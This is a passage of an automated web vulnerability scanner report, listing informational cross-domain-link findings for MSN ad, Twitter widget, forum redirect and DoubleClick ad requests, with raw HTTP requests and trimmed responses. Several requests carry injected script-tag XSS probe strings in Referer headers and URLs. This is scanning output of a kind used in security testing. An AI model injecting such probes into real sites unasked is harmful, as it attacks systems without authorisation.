Host: a.rad.msn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1298
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8282372-T30580561-C1686997
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 02 Feb 2011 21:48:53 GMT
Content-Length: 1298

//<![CDATA[
var contents_182 = '<span><a target="_blank" href="http://g.msn.com/0AD00001/1686997.1?!&&PID=8282372&UIT=G&TargetID=30580561&AN=1496386082&PG=INVXTA">$7 Online
...[SNIP]...
</span><img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1496386082" height="1" width="1" style="display:none;" />';
var fh_182 = null;
if (document.body && document.body.id && document.body.id.length >
...[SNIP]...

17.5. http://a.rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=DC63BAA44C3843F38378B4BB213E0A6F&MUID=DC63BAA44C3843F38378B4BB213E0A6F&PG=INVIHR&AP=1089

The response contains the following links to other domains:

http://clk.redcated/APM/go/197075234/direct;;wi.300;hi.250/01/
http://redcated/APM/iview/197075234/direct;;wi.300;hi.250/01?click=
http://redcated/APM/view/197075234/direct;;wi.300;hi.250/01/

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=DC63BAA44C3843F38378B4BB213E0A6F&MUID=DC63BAA44C3843F38378B4BB213E0A6F&PG=INVIHR&AP=1089 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2420
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P6551410-T37386926-C21000000000018648
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 02 Feb 2011 21:46:51 GMT
Content-Length: 2420

//<![CDATA[
function getRADIds() { return{"adid":"21000000000018648","pid":"6551410","targetid":"37386926"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1896874490() {var adCode_1896874490=new Array();adCode_1896874490.push('<iframe src="http://view.atdmt.com/APM/iview/197075234/direct;;wi.300;hi.250/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">\n');adCode_1896874490.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_1896874490.push('document.write(\'<a href="http://clk.atdmt.com/APM/go/197075234/direct;;wi.300;hi.250/01/" target="_blank"><img src="http://view.atdmt.com/APM/view/197075234/direct;;wi.300;hi.250/01/"/></a>
...[SNIP]...

17.6. http://a0.twimg.com/a/1296609216/stylesheets/fronts.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a0.twimg.com
Path:	/a/1296609216/stylesheets/fronts.css

Issue detail

The page was loaded from a URL containing a query string:

http://a0.twimg.com/a/1296609216/stylesheets/fronts.css?1296615671

The response contains the following link to another domain:

http://www.footprint.net/

Request

GET /a/1296609216/stylesheets/fronts.css?1296615671 HTTP/1.1
Host: a0.twimg.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Wed, 02 Feb 2011 16:19:47 GMT
Content-Type: text/html
Content-Length: 759
Expires: Wed, 02 Feb 2011 16:19:47 GMT
Connection: close

<HTML><HEAD>
<TITLE>ERROR: The requested URL could not be retrieved</TITLE>
</HEAD><BODY>
<H1>ERROR</H1>
<H2>The requested URL could not be retrieved</H2>
<HR>
<P>
While trying to retrieve the URL:
<A
...[SNIP]...
</P>
<a href="http://www.footprint.net">Footprint 4.6/FPMCP</a>
...[SNIP]...
<hr noshade size=1>
Generated Wed, 02 Feb 2011 16:19:47 GMT by 204.160.102.126 (<a href="http://www.footprint.net">Footprint 4.6/FPMCP</a>
...[SNIP]...

17.7. http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a3.twimg.com
Path:	/a/1296609216/javascripts/widgets/widget.js

Issue detail

The page was loaded from a URL containing a query string:

http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296615671

The response contains the following links to other domains:

http://twitter.com/
http://twitter.com/'%20+%20name%20+%20'
http://twitter.com/'%20+%20this._getWidgetPath()%20+%20'
http://twitter.com/'%20+%20tweet.user%20+%20'
http://twitter.com/'%20+%20tweet.user%20+%20'/status/'%20+%20tweet.id%20+%20'
http://twitter.com/'%20+%20userlist%20+%20'
http://twitter.com/'%20+%20username%20+%20'
http://twitter.com/?status=@' + tweet.user + '%20&in_reply_to_status_id=' + tweet.id + '&in_reply_to=' + tweet.user + '
http://twitter.com/search?q=%23' + hash + '

Request

GET /a/1296609216/javascripts/widgets/widget.js?1296615671 HTTP/1.1
Host: a3.twimg.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: q0Ocao100xV5yP9sgoWCKSY1pvtP+lyeT9OcBAQ8CwliDzyEaN2CzcN+WOOmWsX6
x-amz-request-id: BAE2FAEB25064F5F
Last-Modified: Wed, 02 Feb 2011 01:16:53 GMT
ETag: "866492595287304ecf0788d539abec58"
Accept-Ranges: bytes
Content-Type: application/javascript
Server: AmazonS3
X-Amz-Cf-Id: a8e821a947e8ec5d8f782715d0322d45badd7f7820e12da74df2aace9a0c5a322aaed3f9f40dee67,dbbe7a1a7ba56af0ff01b06120e7413fba478574c94a3c0f131c53984f161bbf421632d0655db4b1
X-CDN: AKAM
Expires: Thu, 02 Feb 2012 01:46:12 GMT
Date: Wed, 02 Feb 2011 16:19:47 GMT
Connection: close
Vary: Accept-Encoding
X-CDN: AKAM
Content-Length: 65153

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* Fo
...[SNIP]...
</a>' + m4;
});
},

at: function(tweet) {
return tweet.replace(/\B[@...]([a-zA-Z0-9_]{1,20})/g, function(m, username) {
return '@<a target="_blank" class="twtr-atreply" href="http://twitter.com/' + username + '">' + username + '</a>';
});
},

list: function(tweet) {
return tweet.replace(/\B[@...]([a-zA-Z0-9_]{1,20}\/\w+)/g, function(m, userlist) {
return '@<a target="_blank" class="twtr-atreply" href="http://twitter.com/' + userlist + '">' + userlist + '</a>';
});
},

hash: function(tweet) {
return tweet.replace(/(^|\s+)#(\w+)/gi, function(m, before, hash) {
return before + '<a target="_blank" class="twtr-hashtag" href="http://twitter.com/search?q=%23' + hash + '">#' + hash + '</a>
...[SNIP]...
<div class="twtr-img"><a target="_blank" href="http://twitter.com/' + tweet.user + '"><img alt="' + tweet.user + ' profile" src="' + matchUrlScheme(tweet.avatar) + '">
...[SNIP]...
<p> \
<a target="_blank" href="http://twitter.com/' + tweet.user + '" class="twtr-user">' + tweet.user + '</a>
...[SNIP]...
<em>\
<a target="_blank" class="twtr-timestamp" time="' + tweet.timestamp + '" href="http://twitter.com/' + tweet.user + '/status/' + tweet.id + '">' + tweet.created_at + '</a> ·\
<a target="_blank" class="twtr-reply" href="http://twitter.com/?status=@' + tweet.user + '%20&in_reply_to_status_id=' + tweet.id + '&in_reply_to=' + tweet.user + '">reply</a>
...[SNIP]...
<div><a target="_blank" href="http://twitter.com"><img alt="" src="' + logo + '">
...[SNIP]...
<span><a target="_blank" class="twtr-join-conv" style="color:' + this.theme.shell.color + '" href="http://twitter.com/' + this._getWidgetPath() + '">' + this.footerText + '</a>
...[SNIP]...
{
var name = resp[0].user.screen_name;
this.setProfileImage(resp[0].user.profile_image_url);
this.setTitle(resp[0].user.name);
this.setCaption('<a target="_blank" href="http://twitter.com/' + name + '">' + name + '</a>
...[SNIP]...

17.8. http://acslinda.websitetoolbox.com/file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://acslinda.websitetoolbox.com
Path:	/file

Issue detail

The page was loaded from a URL containing a query string:

http://acslinda.websitetoolbox.com/file?id=855415

The response contains the following link to another domain:

http://www.worldmastiffforum.com/file?id=855415

Request

GET /file?id=855415 HTTP/1.1
Host: acslinda.websitetoolbox.com
Proxy-Connection: keep-alive
Referer: http://www.worldmastiffforum.com/?d11e2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef6a009cb502=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx/0.8.52
Date: Sun, 06 Feb 2011 14:32:18 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Cache-Control: max-age=31104000
Location: http://www.worldmastiffforum.com/file?id=855415
Vary: Accept-Encoding
Content-Length: 324

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.worldmastiffforum.com/file?id=855415">here</a>
...[SNIP]...

17.9. http://acslinda.websitetoolbox.com/file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://acslinda.websitetoolbox.com
Path:	/file

Issue detail

The page was loaded from a URL containing a query string:

http://acslinda.websitetoolbox.com/file?id=855154

The response contains the following link to another domain:

http://www.worldmastiffforum.com/file?id=855154

Request

GET /file?id=855154 HTTP/1.1
Host: acslinda.websitetoolbox.com
Proxy-Connection: keep-alive
Referer: http://www.worldmastiffforum.com/?d11e2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef6a009cb502=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx/0.8.52
Date: Sun, 06 Feb 2011 14:32:18 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Cache-Control: max-age=31104000
Location: http://www.worldmastiffforum.com/file?id=855154
Vary: Accept-Encoding
Content-Length: 324

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.worldmastiffforum.com/file?id=855154">here</a>
...[SNIP]...

17.10. http://acslinda.websitetoolbox.com/file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://acslinda.websitetoolbox.com
Path:	/file

Issue detail

The page was loaded from a URL containing a query string:

http://acslinda.websitetoolbox.com/file?id=855385

The response contains the following link to another domain:

http://www.worldmastiffforum.com/file?id=855385

Request

GET /file?id=855385 HTTP/1.1
Host: acslinda.websitetoolbox.com
Proxy-Connection: keep-alive
Referer: http://www.worldmastiffforum.com/?d11e2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef6a009cb502=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx/0.8.52
Date: Sun, 06 Feb 2011 14:32:18 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Cache-Control: max-age=31104000
Location: http://www.worldmastiffforum.com/file?id=855385
Vary: Accept-Encoding
Content-Length: 324

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.worldmastiffforum.com/file?id=855385">here</a>
...[SNIP]...

17.11. http://acslinda.websitetoolbox.com/file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://acslinda.websitetoolbox.com
Path:	/file

Issue detail

The page was loaded from a URL containing a query string:

http://acslinda.websitetoolbox.com/file?id=855003

The response contains the following link to another domain:

http://www.worldmastiffforum.com/file?id=855003

Request

GET /file?id=855003 HTTP/1.1
Host: acslinda.websitetoolbox.com
Proxy-Connection: keep-alive
Referer: http://www.worldmastiffforum.com/?d11e2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef6a009cb502=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx/0.8.52
Date: Sun, 06 Feb 2011 14:32:18 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Cache-Control: max-age=31104000
Location: http://www.worldmastiffforum.com/file?id=855003
Vary: Accept-Encoding
Content-Length: 324

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.worldmastiffforum.com/file?id=855003">here</a>
...[SNIP]...

17.12. http://acslinda.websitetoolbox.com/file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://acslinda.websitetoolbox.com
Path:	/file

Issue detail

The page was loaded from a URL containing a query string:

http://acslinda.websitetoolbox.com/file?id=855015

The response contains the following link to another domain:

http://www.worldmastiffforum.com/file?id=855015

Request

GET /file?id=855015 HTTP/1.1
Host: acslinda.websitetoolbox.com
Proxy-Connection: keep-alive
Referer: http://www.worldmastiffforum.com/?d11e2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef6a009cb502=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx/0.8.52
Date: Sun, 06 Feb 2011 14:32:18 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Cache-Control: max-age=31104000
Location: http://www.worldmastiffforum.com/file?id=855015
Vary: Accept-Encoding
Content-Length: 324

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.worldmastiffforum.com/file?id=855015">here</a>
...[SNIP]...

17.13. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The page was loaded from a URL containing a query string:

http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838?

The response contains the following links to other domains:

http://b.scorecardresearch.com/beacon.js?c1=3&c2=6035338&c3=5070033&c4=39601754&c5=57234521&c6=&
http://s0.2mdn.net/1986897/TT_GPSCORE_JobMap_FREE_N_300x250.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:30:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8870

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/job_map_f%3Fcid%3Dbn_im_f_anb_op_JbmFr_ppk_300x250%26priorityCode%3D4654900000"><img src="http://s0.2mdn.net/1986897/TT_GPSCORE_JobMap_FREE_N_300x250.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<script src="http://b.scorecardresearch.com/beacon.js?c1=3&c2=6035338&c3=5070033&c4=39601754&c5=57234521&c6=&"></script>
...[SNIP]...

17.14. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The page was loaded from a URL containing a query string:

http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B0579cac1bb9e663e%3B12de70019af,0%3B%3B%3B2909974716,NwQAAJTyAgAptXQAAAAAACzLHQAAAAAAAAAUAAIAAAAAAAgAAQAECgB3HgAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOrwEAAAAAAAIAAwAAAAAArxkA5y0BAAAAAAAAADg2OGRiNTFjLTJlZTEtMTFlMC04NWY4LTAwMzA0OGQ2ZDg5ZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepagee1c21%2522__________script_____alert%281%29_____%2Fscript_____57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F,$http://t.invitemedia.com/track_click?auctionID=1296660699193172-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepagee1c21%2522%5F%5F%5F%5F%5F%5F%5F%5F%5F%5Fscript%5F%5F%5F%5F%5Falert%281%29%5F%5F%5F%5F%5F%2Fscript%5F%5F%5F%5F%5F57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F&redirectURL=;ord=1296660699?

The response contains the following links to other domains:

http://b.scorecardresearch.com/beacon.js?c1=3&c2=6035338&c3=5070033&c4=40150110&c5=57234521&c6=&
http://s0.2mdn.net/1986897/TT_GPS_Frame_NA_N_300x250.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B0579cac1bb9e663e%3B12de70019af,0%3B%3B%3B2909974716,NwQAAJTyAgAptXQAAAAAACzLHQAAAAAAAAAUAAIAAAAAAAgAAQAECgB3HgAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOrwEAAAAAAAIAAwAAAAAArxkA5y0BAAAAAAAAADg2OGRiNTFjLTJlZTEtMTFlMC04NWY4LTAwMzA0OGQ2ZDg5ZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepagee1c21%2522__________script_____alert%281%29_____%2Fscript_____57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F,$http://t.invitemedia.com/track_click?auctionID=1296660699193172-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepagee1c21%2522%5F%5F%5F%5F%5F%5F%5F%5F%5F%5Fscript%5F%5F%5F%5F%5Falert%281%29%5F%5F%5F%5F%5F%2Fscript%5F%5F%5F%5F%5F57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F&redirectURL=;ord=1296660699? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAJTyAgAptXQAAAAAACzLHQAAAAAAAAAUAAIAAAAAAAgAAQAECgB3HgAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOrwEAAAAAAAIAAwAAAAAAAADu0dyY1T8AAABDw1rXPwAA7tHcmNU.AAAAQ8Na1z.6zorJxPnWPwAAAMpi2Ng.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD9uDYoWl2SCckUsbr8uwVGVvc7SShNIRJIwackAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepagee1c21%2522__________script_____alert%281%29_____%2Fscript_____57155bc0307%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Btile%3D2%3Bord%3D2735259747132%3F,Z%3D300x250%26e%3D58661%26I%3Dhomepagee1c21%26_salt%3D3786617703%26B%3D10%26u%3Dhttp%253A%252F%252Fad.doubleclick.net%252Fadi%252Fdmd.ehow%252Fhomepagee1c21%252522__________script_____alert%281%29_____%252Fscript_____57155bc0307%253Bvid%253D0%253Bugc%253D0%253Blvl%253D4%253Bsz%253D300x250%253Btile%253D2%253Bord%253D2735259747132%253F%26r%3D1,868db51c-2ee1-11e0-85f8-003048d6d89e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
